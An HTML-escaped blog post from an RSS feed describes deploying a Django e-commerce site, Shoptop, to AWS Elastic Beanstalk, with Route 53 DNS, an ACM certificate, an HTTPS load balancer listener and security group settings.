&lt;p&gt;If you're in your virtual environment, deactivate it by running:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;deactivate&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Enter the project directory:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;cd ecom&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Then run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb init&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I already have an Elastic Beanstalk config.yaml file it will only prompt me to setup SSH for my instances, however if I did not already launch it, it would ask which AZ to use, an application name, language, and platform I want to use.&lt;/p&gt;

&lt;p&gt;Run&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb create&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This will create the Ec2 instances, security groups, CloudWatch logs and alarms, load balancers, an S3 bucket, etc.&lt;/p&gt;

&lt;p&gt;I chose an application load balancer,  "No" to Spot fleet requests, and chose default options for the rest of the prompts. &lt;/p&gt;

&lt;p&gt;After a 5-10 min, the environment is then successfully created.&lt;/p&gt;

&lt;p&gt;Running the command&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb open&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Opens the project successfully on the web browser.&lt;/p&gt;

&lt;p&gt;Now in the settings.py file:&lt;/p&gt;

&lt;p&gt;Take the URL and add in this line of code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CSRF_TRUSTED_ORIGINS = ['&amp;lt;http://EB URL&amp;gt;']
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This allows you to make POST requests to the website through HTTP.&lt;/p&gt;

&lt;p&gt;When making any changes to the project, save and run:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;eb deploy&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7mnu385je5so92srp6jp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7mnu385je5so92srp6jp.png" alt="Site Main Page" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  2. Route 53
&lt;/h2&gt;

&lt;p&gt;Since the site is only using HTTP, I want to use Route53 to buy a domain and and register an SSL certificate. I used the SSL certificate to help create the 2 CNAME records I need to prove I own shoptop.click and &lt;a href="http://www.shoptop.click" rel="noopener noreferrer"&gt;www.shoptop.click&lt;/a&gt;. Next, I created 2 more A records for shoptop.click and &lt;a href="http://www.shoptop.click" rel="noopener noreferrer"&gt;www.shoptop.click&lt;/a&gt;, using them as an alias to point to my Elastic Beanstalk environment. &lt;/p&gt;

&lt;p&gt;The settings.py file needs to be updated as well to include the new domain name.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;CSRF_TRUSTED_ORIGINS = ["https://shoptop.click", "https://www.shoptop.click"]
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  3. EC2 Load Balancer
&lt;/h2&gt;

&lt;p&gt;Currently, the load balancer is routing traffic from HTTP to the application, but I want to route the HTTP traffic to HTTPS.&lt;/p&gt;

&lt;p&gt;So in the EC2 console I found my load balancer and clicked add listener&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F149w3m7cbuybuwvpa4jy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F149w3m7cbuybuwvpa4jy.png" alt="Load Balancer" width="800" height="159"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then select the HTTPS protocol, which automatically selects port 443.&lt;/p&gt;

&lt;p&gt;For "&lt;strong&gt;Routing Actions&lt;/strong&gt;", I chose "&lt;strong&gt;forward to target groups&lt;/strong&gt;" and chose my "&lt;strong&gt;awseb-...&lt;/strong&gt;" target group that was automatically created with Elastic Beanstalk.&lt;/p&gt;

&lt;p&gt;Then for the SSL/TLS certificate, I select "From "ACM" and look for the certificate that I created for my domain shoptop.click.&lt;/p&gt;

&lt;p&gt;Now add the listener.&lt;/p&gt;

&lt;p&gt;Currently, the HTTPS is not reachable, since the security group still needs to be edited. But first, the HTTP listener needs to be edited to route to my new HTTPS listener instead of directly to my application.&lt;/p&gt;

&lt;p&gt;All this requires is to edit the listener and edit the "&lt;strong&gt;Routing Actions&lt;/strong&gt;" and choose to redirect to URL. Choose HTTPS and port 443.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Security Group
&lt;/h2&gt;

&lt;p&gt;While still in the EC2 console, I edited the security group by clicking "&lt;strong&gt;Security Groups&lt;/strong&gt;" on the left sidebar. I found the "&lt;strong&gt;AWSELBLoadBalancerSecurityGroup...&lt;/strong&gt;" and choose to edit its inbound rules.&lt;/p&gt;

&lt;p&gt;Here is the configuration:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls1uhpinl0uvygx5wnhj.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fls1uhpinl0uvygx5wnhj.png" alt="Security Group Configuration" width="800" height="253"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now looking back at the load balancer, there is no longer an error for the HTTPS listener.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qdds5y5cxt3c2v0grte.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F9qdds5y5cxt3c2v0grte.png" alt="Load Balancer Listeners" width="800" height="216"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Shoptop is now up and running easily with Elastic Beanstalk and securely with HTTPS.&lt;/p&gt;

&lt;p&gt;Moving forward, I want to look into securing the database against SQL injections utilizing AES, which might run up costs (this project is costing ~$100/mo already while running on AWS). I already had almost 20 fake users on the site only a day after I launched. Apparently email confirmation isn't enough to stop bots, but I implemented CAPTCHAv2 and haven't had a problem since.&lt;/p&gt;

</description>
    </item>
  </channel>
</rss>
